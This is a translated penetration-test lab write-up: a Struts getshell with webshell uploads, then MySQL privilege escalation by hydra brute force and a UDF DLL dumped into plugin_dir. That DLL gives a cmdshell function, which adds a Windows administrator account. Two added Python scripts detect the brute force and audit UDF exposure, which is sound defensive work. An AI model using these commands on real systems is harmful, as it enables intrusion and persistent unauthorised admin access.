0428

0x01 struts getshell

1.1 Find a URL ending in .action

1.2 Manipulate the URL so that a URL appears in it

1.3 Paste the URL into the tool, click the third vulnerability and retrieve information

1.4 Execute commands

1.5 Upload in turn the test file test.txt, the small shell one.8.jsp, the cmd shell k8cmd.jsp and the large shell css.jsp

1.6 Result: test.txt, one8.jsp and k8cmd.jsp upload successfully; css.jsp does not, so another method is needed

1.7 Connect to the small shell, paste the Chopper (菜刀) shell code into the content box and click the "upload code" button

1.8 Verify that the file was uploaded successfully

1.9 Connect with Chopper

0x02 Privilege escalation through a MySQL instance that allows remote connections

2.1 Create a user n00p on the victim and grant it remote-connection privileges

```sql
CREATE USER 'n00p'@'localhost' IDENTIFIED BY 'n00p';
GRANT ALL PRIVILEGES ON *.* TO 'n00p'@'%' IDENTIFIED BY 'n00p' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```

2.2 Build a wordlist on Kali

```bash
root@kali:~/dock# cat user.txt
root
n00p
root@kali:~/dock# cat pass.txt
root
n00p
```

2.3 Brute-force successfully with hydra

```bash
root@kali:~/dock# hydra vic mysql -L user.txt -P pass.txt -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-27 23:23:55
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking mysql://vic:3306/
[ATTEMPT] target vic - login "root" - pass "root" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target vic - login "root" - pass "n00p" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "root" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "n00p" - 4 of 4 [child 3] (0/0)
[3306][mysql] host: vic login: n00p password: n00p
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-27 23:23:55
```
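On the server side, the four hydra attempts above appear as failed-login warnings in the MySQL error log (on 5.x they are written when log_warnings is 2 or higher). The script below is an added example, not part of the original write-up: it parses constructed sample lines in the 5.5 error-log format and flags any source host that accumulates a threshold of failures inside a sliding time window. The sample lines, the threshold, the window and the function names are assumptions for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# CONSTRUCTED sample lines in the MySQL 5.5 error-log format ("YYMMDD HH:MM:SS [level] ...").
# They are not output from the page; the hosts are documentation addresses.
SAMPLE_LOG = """\
180427 23:23:55 [Warning] Access denied for user 'root'@'192.0.2.10' (using password: YES)
180427 23:23:55 [Warning] Access denied for user 'root'@'192.0.2.10' (using password: YES)
180427 23:23:55 [Warning] Access denied for user 'n00p'@'192.0.2.10' (using password: YES)
180427 23:23:56 [Note] Unrelated line that the parser must ignore
180427 23:23:56 [Warning] Access denied for user 'n00p'@'192.0.2.10' (using password: YES)
180427 23:40:01 [Warning] Access denied for user 'app'@'10.0.0.7' (using password: YES)
"""

DENIED_RE = re.compile(
    r"^(?P<ts>\d{6} \d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denials(log_text):
    """Yield (timestamp, user, source_host) for every failed-login line."""
    for line in log_text.splitlines():
        m = DENIED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%y%m%d %H:%M:%S")
        yield ts, m.group("user"), m.group("host")


def detect_bruteforce(log_text, threshold=3, window=timedelta(minutes=1)):
    """Return {source_host: {"attempts": n, "users": [...]}} for every source
    that produced at least `threshold` failures inside some `window`.
    `attempts` is the largest number of failures seen in any single window."""
    by_host = defaultdict(list)
    for ts, user, host in parse_denials(log_text):
        by_host[host].append((ts, user))

    alerts = {}
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                users = sorted({u for _, u in events[start:end + 1]})
                prev = alerts.get(host)
                if prev is None or count > prev["attempts"]:
                    alerts[host] = {"attempts": count, "users": users}
    return alerts


if __name__ == "__main__":
    for host, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{host}: {info['attempts']} failures in one window, users tried: {info['users']}")
```

Feed it the live error log instead of SAMPLE_LOG to get the same per-source counts; an account such as 'n00p'@'%' is only reachable by this kind of guessing because its host part is a wildcard, so restricting the host in the GRANT removes the exposure regardless of what the log shows.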

2.4 Connect with a MySQL client; Navicat is used here

2.5 Right-click the connection, open Console and enter set @my_udf_a=concat('', <hex of the DLL>);

```sql
mysql> use mysql;
Database changed
mysql> set @my_udf_a=concat('', <omitted here for brevity>);
Query OK, 0 rows affected (0.00 sec)
```

2.6 Create table my_udf_data with a single column data of type longblob

```sql
mysql> create table my_udf_data(data LONGBLOB);
Query OK, 0 rows affected (0.08 sec)
```

2.7 Update my_udf_data with the data held in @my_udf_a

```sql
mysql> insert into my_udf_data values("");
Query OK, 1 row affected (0.00 sec)
```

2.8 Overwrite the row with @my_udf_a

```sql
mysql> update my_udf_data set data = @my_udf_a;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0
```

2.9 Check the DLL export path

MySQL < 5.0: any export path works;

5.0 <= MySQL < 5.1: the DLL must be exported to the target's system directory (e.g. system32), otherwise the next step fails with "No paths allowed for shared library";

MySQL > 5.1: the DLL must be exported to the plugin path, which can be found with the following command: show variables like '%plugin%';

```sql
mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.5.53    |
+-----------+
1 row in set (0.01 sec)
mysql> show variables like '%plugin%';
+---------------+-------------------------------------------+
| Variable_name | Value                                     |
+---------------+-------------------------------------------+
| plugin_dir    | C:\phpStudy\PHPTutorial\MySQL\lib\plugin\ |
+---------------+-------------------------------------------+
1 row in set (0.01 sec)
```

2.10 Export the DLL

Here the plugin folder did not exist; since this is a test environment, it was created by hand on the target machine

```sql
mysql> select data from my_udf_data into DUMPFILE 'C:\phpStudy\PHPTutorial\MySQL\lib\plugin\n00p.dll';
1 - Can't create/write to file 'C:phpStudyPHPTutorialMySQLlibplugin
00p.dll' (Errcode: 22)
mysql> select data from my_udf_data into DUMPFILE 'C:/phpStudy/PHPTutorial/MySQL/lib/plugin/n00p.dll';
Query OK, 1 row affected (0.00 sec)
```

As the block above shows, single backslashes in the path do not work; they must be converted to single forward slashes or double backslashes

2.11 Create the cmdshell function

```sql
mysql> create function cmdshell returns string soname 'n00p.dll';
Query OK, 0 rows affected (0.08 sec)
```

2.12 Escalate privileges through the cmdshell function

The output here is garbled for an unknown reason, but the commands were certainly executed; this is verified shortly

```sql
mysql> select cmdshell('net user n00p n00p /add');
+----------------------------------------------------------+
| cmdshell('net user n00p n00p /add')                      |
+----------------------------------------------------------+
| ����ɹ���ɡ�


--------------------------------------------���!
 |
+----------------------------------------------------------+
1 row in set (0.41 sec)

mysql> select cmdshell('net localgroup administrators n00p /add');
+----------------------------------------------------------+
| cmdshell('net localgroup administrators n00p /add')      |
+----------------------------------------------------------+
| ����ɹ���ɡ�


--------------------------------------------���!
 |
+----------------------------------------------------------+
1 row in set (0.05 sec)
```

2.13 The target machine has port 3389 open; log in to verify: success!
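Steps 2.5 to 2.12 (and the udf.php route in 0x03, which ends the same way) depend on three server-side conditions: SELECT ... INTO DUMPFILE is allowed to write into plugin_dir, an account with FILE/SUPER is reachable from a wildcard host, and a new row in mysql.func goes unnoticed. The following audit is an added example, not code from the page: it takes the results of `SHOW VARIABLES`, `SELECT name, dl FROM mysql.func` and `SELECT user, host, File_priv, Super_priv FROM mysql.user` as plain Python values (constructed samples below, shaped after the write-up) and reports which of those conditions hold. The function names, the allow-list argument and the sample rows are assumptions.

```python
def _norm_dir(path):
    """Normalise a Windows or POSIX directory for comparison (the write-up
    shows both 'C:\\...\\plugin\\' and 'C:/.../plugin/' naming the same place)."""
    return path.replace("\\", "/").rstrip("/").casefold()


def audit_udf_exposure(variables, func_rows, user_rows, allowed_libs=frozenset()):
    """Return a list of (rule, detail) findings.

    variables    : dict built from SHOW VARIABLES (secure_file_priv, plugin_dir)
    func_rows    : rows of SELECT name, dl FROM mysql.func
    user_rows    : rows of SELECT user, host, File_priv, Super_priv FROM mysql.user
    allowed_libs : library file names the DBA deliberately installed
    """
    findings = []
    sfp = variables.get("secure_file_priv")
    plugin_dir = variables.get("plugin_dir", "")

    # secure_file_priv: NULL disables INTO DUMPFILE entirely; '' lets it write
    # anywhere mysqld can, including plugin_dir (what step 2.10 relies on);
    # a directory confines it to that directory.
    if sfp is None or sfp.upper() == "NULL":
        pass
    elif sfp == "":
        findings.append(("secure_file_priv_unrestricted",
                         "secure_file_priv is empty, so INTO DUMPFILE can write into plugin_dir"))
    elif _norm_dir(sfp) == _norm_dir(plugin_dir):
        findings.append(("secure_file_priv_is_plugin_dir",
                         "secure_file_priv points at plugin_dir, so DUMPFILE can still drop a loadable library"))

    # Every function registered in mysql.func must load from a known library;
    # step 2.11 leaves a row (cmdshell, n00p.dll) that no DBA put there.
    for name, dl in func_rows:
        if dl not in allowed_libs:
            findings.append(("unexpected_udf", f"function {name} loads {dl}, which is not on the allow-list"))

    # FILE (required for DUMPFILE) or SUPER on an account whose host part is a
    # wildcard is the combination the brute-force in 2.3 went looking for.
    for user, host, file_priv, super_priv in user_rows:
        if (file_priv == "Y" or super_priv == "Y") and ("%" in host or "_" in host):
            findings.append(("privileged_wildcard_host",
                             f"'{user}'@'{host}' has FILE/SUPER and a wildcard host"))
    return findings


# CONSTRUCTED samples standing in for the query results (not from the page).
SAMPLE_VARIABLES = {"secure_file_priv": "", "plugin_dir": "C:/mysql/lib/plugin/"}
SAMPLE_FUNC_ROWS = [("cmdshell", "n00p.dll")]
SAMPLE_USER_ROWS = [
    ("root", "localhost", "Y", "Y"),
    ("n00p", "%", "Y", "Y"),
    ("app", "10.0.0.%", "N", "N"),
]


def run_sample():
    """Audit the constructed sample as a DBA would audit live query results."""
    return audit_udf_exposure(SAMPLE_VARIABLES, SAMPLE_FUNC_ROWS, SAMPLE_USER_ROWS)


if __name__ == "__main__":
    for rule, detail in run_sample():
        print(f"{rule}: {detail}")
```

Run against a real server, an empty result from this audit means the DUMPFILE-into-plugin_dir path is closed (secure_file_priv set to NULL or to a directory other than plugin_dir), no unexpected UDF is registered, and no wildcard-host account carries FILE or SUPER; checking mysql.func on a schedule is also the cheapest way to notice a cmdshell-style function after the fact.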



0x03 Escalating privileges on a MySQL instance that does not allow remote connections, using the large shell dama.php plus udf.php

3.1 Change the test environment:

Switch Apache on the target to run as a service, add a low-privilege user, and give that user read/write permission on the log files

3.2 Assuming the site has a file-upload vulnerability, upload a large shell and use it to upload udf.php

3.3 Browse to udf.php and fill in the MySQL connection details

3.4 Use the large shell to look up the plugin directory

3.5 Open udf.php, enter the directory and click "export to this directory":

Double backslashes are used here; the width attribute of the HTML element was also changed so that the input box shows the full path

3.6 Create the function with the SQL statement:

3.7 The function can now be run from the SQL command box; the remaining steps are the same as the second half of 0x02 and are not repeated.
